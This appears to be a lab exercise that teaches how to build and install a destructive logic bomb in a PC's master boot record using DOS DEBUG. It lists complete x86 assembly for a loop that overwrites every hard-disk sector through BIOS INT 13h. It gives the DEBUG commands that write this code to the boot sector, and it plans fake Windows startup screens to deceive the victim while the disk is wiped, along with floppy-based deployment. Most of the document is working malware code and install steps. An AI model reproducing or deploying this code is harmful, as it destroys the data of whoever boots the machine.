Preparation
-
Since the planned logic bomb will do largescale devastation to the target HDD, a ghost restore image will be placed on a lab PC for the purposes of development and testing of the logic bomb. It is highly destructive and should never be tested on a PC of any value.
Procedures
After preparing a "guinea pig" PC run DEBUG and save the MBR to a file on a bootable floppy diskette so that it can be restored at will along with a GHOST restoration of the entire HDD if and when necessary during the course of this operation.
The MBR will then be modified into a logic bomb and saved again as a file with a different name. Later, batch files will be developed for deploying the logic bomb. The purpose of the logic bomb is to destroy the contents of the HDD if the PC is booted by anyone who does not know about the existence of the bomb and how to keep it from destroying the HDD. The logic bomb works by placing the destructive code within the MBR which gets to automatically execute when the PC boots up. The changed MBR code will proceed to overwrite the HDD sector-by-sector with nonsense rather than do what it is supposed to do which is to find and launch the DBR of the active partition.
The logic bomb code must do the following:
- Set the Data Segment of the CPU to 07C0h, which is the physical RAM segment to which the MBR gets loaded by the BIOS Boot Strap Loader.
- Set the Extra Segment of the CPU to F000h which is the offset to the BIOS ROM code in RAM. This will be the data that will be written to the sectors thereby overwriting the important data with it. The BIOS INT13h call uses the ES rather than the DS which is actually useful in that normal variables can be accessed with the DS and HDD read/writes can be pointed to by the ES.
- Most modern ATA controllers and HDD's support 64 sector "block transfers" This means that 64 sectors at a time can be read from or written to the HDD in a single INT 13h call. This is fortunate in that it will speed up the logic bomb code as well as simplify it. The basic concept is that using geometry, we want the logic bomb to point to Cylinder 0, Head 0, Sector 1 and write 64 sectors of garbage (the BIOS ROM code) to it blowing away the entire track, then advance to the next head and do it again, and so on to the last head, then advance to Cylinder 1, Head 0, Sector 1 and do it again counting up through the heads to the last one, then advance to the next Cylinder's Head 0, Sector 1 and continue up to the last cylinder and then quit. This will require that you know the geometry of the HDD. For the purposes of this exercise it will be assumed to be a drive larger than 8.4GB (the classic translated geometry limit) with a geometry of Cyls = 1024, Heads = 255, Sectors/Track = 63.
- Later the logic bomb will be modified to "entertain" the unsuspecting user who attempts to start the PC with what appears to be normal screen display activities of Windows XP starting up, but these will be dummies intended to make the user think that the machine is booting normally when in actuality the logic bomb will be busily doing its job of destroying the contents of the HDD.
- While in DEBUG, use the N command and name the file "bug.mbr" and then use the W command to save it under the new name.
- The actual machine language instructions are listed below along with explanations:
MOV AX, F000 These two lines set the ES register to F000, the offset of the
MOV ES, AX BIOS ROM code as the data source to be written to the HDD sectors
XOR BX, BX This is a legal instruction that rapidly sets the BX = 0
MOV DL, 80 This sets the INT 13h parameter to work on physical drive 80h
MOV CL, 1 INT 13h parameter, target sector is Sector #1
MOV CH, 0 INT 13h parameter, target sector is in Cyl #0
MOV DH, 0 INT 13h parameter, target sector is in Head #0
MOV AX, 0340 INT 13h parameters, 03 = Write, 40 = 64 sectors
INT 13 CALL BIOS INT 13h services
INC DH Advance to the next Head number (INC = INCrement by one)
CMP DH, FF Check to make sure it has not reached 255 which does not exist
(NOTE: the HDD has 255 heads, they are numbered 0 - 254)
JE (current offset + 4) Once this value is reached then cylinder # must be incremented
and Head number must be reset to 0, the jump will occur only if the
preceding compare found the value in DH = FF
JMP (offset of the MOV AX, 0340 instruction) This repeats the call to write 64 sectors
having changed the register value to point to the next head number
INC CH Advance to the next Cylinder #
CMP CH, 0 Cylinder 255 DOES exist so we check to see if it wrapped back around to 0
JE (offset + 4) If it has wrapped around to 0 again, then jump to change the sector #
(NOTE: the top 2 bits of the sector number held in CL are the top 2 bits
of a 10 bit cylinder number)
JMP (offset of the MOV DH, 0 instruction) Otherwise continue the loop and reset the head
number to 0
ADD CL, 40 This adds one to the top 2 bits of the sector number, advancing the top 2
bits which belong to the 10 bit cylinder number
JC (offset + 4) This is done because C1 + 40 = 101 but the 3rd place does not fit in the
8-bit register so the result is truncated to 01. However, the addition
will set the carry flag
JMP (offset of the MOV CH, 0 instruction) This will be sure to reset the bottom 8 bits
of the cylinder number to 0 and reset the head number to zero, then call
BIOS to write 64 sectors continuing the loop
NOP This prepares to hang the machine executing the instruction that does
nothing
JMP (offset of the NOP instruction) loops forever on the NOP instruction
Now all that remains is to enter this code into "BUG.MBR" and save it again. Start the DEBUG assembler with "a 100" then type in the above code, when a jump instruction offset is needed, calculate it or observe it as the case requires and enter it:
-a 100
0AFE:0100 mov ax, f000
0AFE:0103 mov es, ax
0AFE:0105 xor bx, bx
0AFE:0107 mov dl, 80
0AFE:0109 mov cl, 1
0AFE:010B mov ch, 0
0AFE:010D mov dh, 0
0AFE:010F mov ax, 340
0AFE:0112 int 13
0AFE:0114 inc dh
0AFE:0116 cmp dh, ff
0AFE:0119 je 11d <- 119 + 4 = 11D hex
0AFE:011B jmp 10f <- address of mov ax, 340
0AFE:011D inc ch
0AFE:011F cmp ch, 0
0AFE:0122 je 126 <- 122 + 4 = 126
0AFE:0124 jmp 10d <- address of mov dh, 0
0AFE:0126 add cl, 40
0AFE:0129 jc 12d <- 129 + 4 = 12D hex
0AFE:012B jmp 10b <- address of mov ch, 0
0AFE:012D nop
0AFE:012E jmp 12d <- address of nop
0AFE:0130
-_
Execute the W command again to save the changes. Now create and execute the code within DEBUG that will write the new MBR code to the first physical sector of the HDD:
a 300
0AFE:0300 mov ax, 301
0AFE:0303 mov bx, 100
0AFE:0306 mov cx, 1
0AFE:0309 mov dx, 80
0AFE:030C int 13
0AFE:030E int 3
0AFE:030F
-g=300
The logic bomb is now in place. Reboot the machine to the HDD and at the point after the POST screens with the cursor at the bottom of the screen, when the OS startup should begin, the system will simply hang. Observe the HDD activity light. It should stay lit indicating constant activity as the loop proceeds to overwrite the entire drive with a 32KB section the BIOS code block at F000:0000h.
Interrupt the logic bomb after about 20 seconds. The amount of time that the average user would wait at this point before realizing that something is wrong, by pressing [Ctrl]+[Alt]+[Delete]. Insert New Boot A or its equivalent and start Norton Utilities DiskEdit. Change to physical disks > Physical Hard Disk 1. Then Page down through the disaster.
In the next exercise, an easy deployment method using a bootable floppy diskette equipped with batch files that can load either the good MBR or the bad one will be developed.
Working complete PC